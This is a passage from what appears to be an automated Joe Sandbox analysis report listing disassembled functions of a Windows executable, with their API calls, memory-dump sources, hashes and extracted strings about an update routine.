                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  • FindFirstFileA.KERNEL32(?,?,00000000,?,?,005108D0,00510870,0000005C,?), ref: 004093FF
                                                                                  • IsWindow.USER32(?), ref: 0040940E
                                                                                  • InterlockedIncrement.KERNEL32(00000000), ref: 0040951A
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040957D
                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040958E
                                                                                  • FindFirstFileA.KERNEL32(?,?,00000000,000000FF,?,?), ref: 004095D8
                                                                                  • IsWindow.USER32(?), ref: 00409629
                                                                                  • InterlockedIncrement.KERNEL32(00000000), ref: 004096B1
                                                                                  • FindNextFileA.KERNEL32(00000000,00000010), ref: 004096C8
                                                                                    • Part of subcall function 004097AB: __EH_prolog.LIBCMT ref: 004097B0
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                    • Part of subcall function 004C9476: SetWindowTextA.USER32(00000000,00000001), ref: 004C9484
                                                                                  • FindClose.KERNEL32(00000000), ref: 004096D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$Interlocked$FileH_prologIncrement$Window$CloseFirstNext$DecrementText
                                                                                  • String ID:
                                                                                  • API String ID: 3290279668-0
                                                                                  • Opcode ID: 0c063f569731c6464291938ac4df01fd5bc37abf96634f97786166df20452094
                                                                                  • Instruction ID: eb30415868640522b9bfc716b3df9e7b03d9c07fdc694b9913ec69d124313e1d
                                                                                  • Opcode Fuzzy Hash: 0c063f569731c6464291938ac4df01fd5bc37abf96634f97786166df20452094
                                                                                  • Instruction Fuzzy Hash: 31C15C75900249EFDF05EFA5C945FEEBBB8AF18304F10416EF415A3282DB789A44CB69
                                                                                  Function 00409040 Relevance: 12.1, APIs: 8, Instructions: 83stringfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00409045
                                                                                  • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?), ref: 00409063
                                                                                  • lstrcpyn.KERNEL32(?,?,00000104), ref: 00409072
                                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,00510870,00510870,?), ref: 004090C0
                                                                                  • CharUpperA.USER32(?), ref: 004090D1
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004090E7
                                                                                  • FindClose.KERNEL32(00000000), ref: 004090F3
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00409103
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
                                                                                  • String ID:
                                                                                  • API String ID: 304730633-0
                                                                                  • Opcode ID: 7c51cea527fee40ecfb70da6e07eae198d549b63496766d257d2b929e2014a3c
                                                                                  • Instruction ID: 3c690ff6938015ef219a78b2defa5664c7cfaef41eca28e2758ac67f36bf4a93
                                                                                  • Opcode Fuzzy Hash: 7c51cea527fee40ecfb70da6e07eae198d549b63496766d257d2b929e2014a3c
                                                                                  • Instruction Fuzzy Hash: 06218D71500059BBDB109F65DC88EEF7BBCEF85364F00813AF91AEA0A2D7348E45CA64
                                                                                  Function 00408EFE Relevance: 7.6, APIs: 5, Instructions: 108filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00408F03
                                                                                    • Part of subcall function 00409040: __EH_prolog.LIBCMT ref: 00409045
                                                                                    • Part of subcall function 00409040: GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?), ref: 00409063
                                                                                    • Part of subcall function 00409040: lstrcpyn.KERNEL32(?,?,00000104), ref: 00409072
                                                                                  • GetFileAttributesA.KERNEL32(?), ref: 00408F28
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00408F3F
                                                                                  • FindFirstFileA.KERNEL32(?,?,00510870,?), ref: 00408F9F
                                                                                  • FindClose.KERNEL32(00000000), ref: 00408FAF
                                                                                    • Part of subcall function 00408DC6: FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00408DE4
                                                                                    • Part of subcall function 00408DC6: FileTimeToSystemTime.KERNEL32(?,?), ref: 00408DFA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Time$FindH_prolog$AttributesCloseFirstFullLocalNamePathSystemlstrcpylstrcpyn
                                                                                  • String ID:
                                                                                  • API String ID: 1689072006-0
                                                                                  • Opcode ID: 93916d189c6d2e1dbc8889ba9da626245188f31858263e0e5acde0a8cef1400f
                                                                                  • Instruction ID: 9cf229ab2ce5aa8aa9f8e251c4c3b6f6ea103c6faf5d36c496deb3f574f828fc
                                                                                  • Opcode Fuzzy Hash: 93916d189c6d2e1dbc8889ba9da626245188f31858263e0e5acde0a8cef1400f
                                                                                  • Instruction Fuzzy Hash: B341D032400219AFCB10EF65DC84ADE7BB8EF19324F10816EF455A61D2DB78AA85CB54
                                                                                  Function 00414AF3 Relevance: 6.1, APIs: 4, Instructions: 122stringcomCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoCreateInstance.COMBASE(004F0940,00000000,00000001,004F0950,?), ref: 00414B2B
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00414B48
                                                                                  • lstrlen.KERNEL32(?,?,00000104), ref: 00414BF5
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000), ref: 00414C05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharCreateInstanceMultiWidelstrcpylstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3671088469-0
                                                                                  • Opcode ID: e58c8b2767dd72bc0355bbb605f17906259b4d2376c1e461499f36f5aae7ad97
                                                                                  • Instruction ID: 78b939d98803b1807cb245ac68c61ba649b68a187c194e7fdbd6ff9d850bcdeb
                                                                                  • Opcode Fuzzy Hash: e58c8b2767dd72bc0355bbb605f17906259b4d2376c1e461499f36f5aae7ad97
                                                                                  • Instruction Fuzzy Hash: EF41EA75A00208AFCB15DFA4C888DDAB7B9EF8C304F1049A9E606E7251DA75AE45CF50
                                                                                  Function 004C8744 Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                  • GetKeyState.USER32(00000010), ref: 004C8768
                                                                                  • GetKeyState.USER32(00000011), ref: 004C8771
                                                                                  • GetKeyState.USER32(00000012), ref: 004C877A
                                                                                  • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 004C8790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$LongMessageSendWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1063413437-0
                                                                                  • Opcode ID: c58440cf276bba1fb2e753070a553f592f410798ecd7a712afd87d9b28c5960c
                                                                                  • Instruction ID: 5f2ece1f685465f06d40f81f558322c85fec79ddb4a189e7889e63e4cb900121
                                                                                  • Opcode Fuzzy Hash: c58440cf276bba1fb2e753070a553f592f410798ecd7a712afd87d9b28c5960c
                                                                                  • Instruction Fuzzy Hash: 55F0A77E3513A636E5A037661CC2FEA51144F80BD8F21093FF741AE1D19DA988025678
                                                                                  Function 004A04A0 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(?,?,?), ref: 004A04B1
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004A04C8
                                                                                  • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 004A04DD
                                                                                  • FindClose.KERNEL32(00000000), ref: 004A04E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                  • String ID:
                                                                                  • API String ID: 2659516521-0
                                                                                  • Opcode ID: d71e27fb602cd53bae843787bef0dead24d196c0517cce9374aa923cf4baf809
                                                                                  • Instruction ID: 2b0184bf3356b5fe652337c2ad6085dceda859ca43c6ed6b8a82855511b3d722
                                                                                  • Opcode Fuzzy Hash: d71e27fb602cd53bae843787bef0dead24d196c0517cce9374aa923cf4baf809
                                                                                  • Instruction Fuzzy Hash: 04F08132404212AFE310DF64DC888FB77A8EFC4354F448E3DB5A586290E638D9098B96
                                                                                  Function 004A893C Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 004A895B
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004A8967
                                                                                  • LockResource.KERNEL32(00000000), ref: 004A8972
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLock
                                                                                  • String ID:
                                                                                  • API String ID: 2752051264-0
                                                                                  • Opcode ID: 85eb03e311d2d0dccd8efc5da87a24713e0603720b9aaa1723f2be7801271ec2
                                                                                  • Instruction ID: de03dbaef62dc7c655f5520c0ba82d030221b98600543bb046c194861b3e7921
                                                                                  • Opcode Fuzzy Hash: 85eb03e311d2d0dccd8efc5da87a24713e0603720b9aaa1723f2be7801271ec2
                                                                                  • Instruction Fuzzy Hash: ECF036B52012019FDB105F619C48E6B7BADFFE5791F05407EF645D6261CF24CC05C666
                                                                                  Function 004746A5 Relevance: 3.0, APIs: 2, Instructions: 17sleepwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 004746B2
                                                                                    • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                  • Sleep.KERNEL32(00000064,00000009), ref: 004746C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconicShowSleepWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2011448064-0
                                                                                  • Opcode ID: 6cf04397f4527dd48fc28eb9d180893c3b96b3edbb9313c547cba1cbd133835a
                                                                                  • Instruction ID: 9359af80a719784aa630fd9b3a30eef51e90517b80814043480ce0131e65b64f
                                                                                  • Opcode Fuzzy Hash: 6cf04397f4527dd48fc28eb9d180893c3b96b3edbb9313c547cba1cbd133835a
                                                                                  • Instruction Fuzzy Hash: 5FD05E35310360ABD6653B22AC09F6E21656F94B09F16C12FF5069A2E1CB7C5D06865D
                                                                                  Function 0044D2A9 Relevance: 45.4, APIs: 30, Instructions: 365COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0044D303
                                                                                  • GetTextExtentPoint32A.GDI32(?,00514C20,00000001,?), ref: 0044D31D
                                                                                  • GetTextExtentPoint32A.GDI32(?,00514C1C,00000001,?), ref: 0044D338
                                                                                  • GetTextExtentPoint32A.GDI32(?,00514C20,00000001,?), ref: 0044D34F
                                                                                  • GetTextExtentPoint32A.GDI32(?,00514C18,00000001,?), ref: 0044D378
                                                                                  • GetTextExtentPoint32A.GDI32(?,00514C14,00000001,?), ref: 0044D393
                                                                                  • GetTextExtentPoint32A.GDI32(?,00514C18,00000001,?), ref: 0044D3AA
                                                                                  • GetTextExtentPoint32A.GDI32(?,00514C20,00000001,?), ref: 0044D3D5
                                                                                  • GetTextExtentPoint32A.GDI32(?,00514C1C,00000001,?), ref: 0044D3F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExtentPoint32Text
                                                                                  • String ID:
                                                                                  • API String ID: 223599850-0
                                                                                  • Opcode ID: a1cbc041c5ff906cd7b77934cb317ab6a3c4d257d1684ffd8fb8857cc9974ead
                                                                                  • Instruction ID: ee3cc0c45a13de6ebbdb90a5d8391fb01261f10fc844bd6ec9c65133fec3ad37
                                                                                  • Opcode Fuzzy Hash: a1cbc041c5ff906cd7b77934cb317ab6a3c4d257d1684ffd8fb8857cc9974ead
                                                                                  • Instruction Fuzzy Hash: DCD18FB1D0011DAFAB01DF99CE81CEEBBB9FB08704B108562F914B2251D775AE919FA4
                                                                                  Function 004D4E91 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 47registryclipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegisterClipboardFormatA.USER32(Native), ref: 004D4EAF
                                                                                  • RegisterClipboardFormatA.USER32(OwnerLink), ref: 004D4EB8
                                                                                  • RegisterClipboardFormatA.USER32(ObjectLink), ref: 004D4EC2
                                                                                  • RegisterClipboardFormatA.USER32(Embedded Object), ref: 004D4ECC
                                                                                  • RegisterClipboardFormatA.USER32(Embed Source), ref: 004D4ED6
                                                                                  • RegisterClipboardFormatA.USER32(Link Source), ref: 004D4EE0
                                                                                  • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 004D4EEA
                                                                                  • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 004D4EF4
                                                                                  • RegisterClipboardFormatA.USER32(FileName), ref: 004D4EFE
                                                                                  • RegisterClipboardFormatA.USER32(FileNameW), ref: 004D4F08
                                                                                  • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 004D4F12
                                                                                  • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 004D4F1C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardFormatRegister
                                                                                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                  • API String ID: 1228543026-2889995556
                                                                                  • Opcode ID: f3077c1de8875eeafef3183cb3b2f6d42ececf4bf02a14d3faddd7ed7a51726e
                                                                                  • Instruction ID: 85db0b8c900afddcadc13cce40081e6c31571f071db02c40991e2d3ceef4d78d
                                                                                  • Opcode Fuzzy Hash: f3077c1de8875eeafef3183cb3b2f6d42ececf4bf02a14d3faddd7ed7a51726e
                                                                                  • Instruction Fuzzy Hash: 2B01AD70A407C49A8770AF739C0990BBAE0EFC1B113228D3FD14597681E6BDA5098F4C
                                                                                  Function 004703CD Relevance: 35.5, APIs: 3, Strings: 17, Instructions: 474windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004703D2
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 004C6286: lstrlen.KERNEL32(00000001,?,?,0040264F,?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00402920), ref: 004C6297
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                    • Part of subcall function 00471F70: __EH_prolog.LIBCMT ref: 00471F75
                                                                                  • MessageBoxA.USER32(00000000,00000000,?,MSG_UPDATE_ABORT_NEEDED), ref: 00470736
                                                                                  • MessageBoxA.USER32(00000000,00000000,?,MSG_UPDATE_RESTART_NEEDED), ref: 00470819
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0046F95E: __EH_prolog.LIBCMT ref: 0046F963
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$IncrementInterlockedMessagelstrlen
                                                                                  • String ID: "%s:%s" "%s:%s" %s %s$"%s:%s" %s %s$.dat$.ts3$/DATFILE$/TUCPS$/TURC$0:R$Automatic update required.$Dat file updated: '%s'$MSG_UPDATE_ABORT_NEEDED$MSG_UPDATE_ABORT_TITLE$MSG_UPDATE_RESTART_NEEDED$MSG_UPDATE_RESTART_TITLE$Restarting update executable: '%s'$The source folder is not writable following rules.$The update has been aborted.
                                                                                  • API String ID: 684416522-2187568835
                                                                                  • Opcode ID: 6cf10cfd42b7873d48c108fb1ff81284e214efbe0c2270582b2f69302024fb9a
                                                                                  • Instruction ID: 161f0c60bef826d5ab6deda4dd7a275270dc72c749787c8c346f57a2eb6d5ea3
                                                                                  • Opcode Fuzzy Hash: 6cf10cfd42b7873d48c108fb1ff81284e214efbe0c2270582b2f69302024fb9a
                                                                                  • Instruction Fuzzy Hash: 8B028474A1020DEFDF14EBA5C942FEE7BB9AF18304F00405EF509A3291DB786A45DB69
                                                                                  Function 004A07D0 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 150stringfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,00000000,00000520), ref: 004A07DE
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004A0807
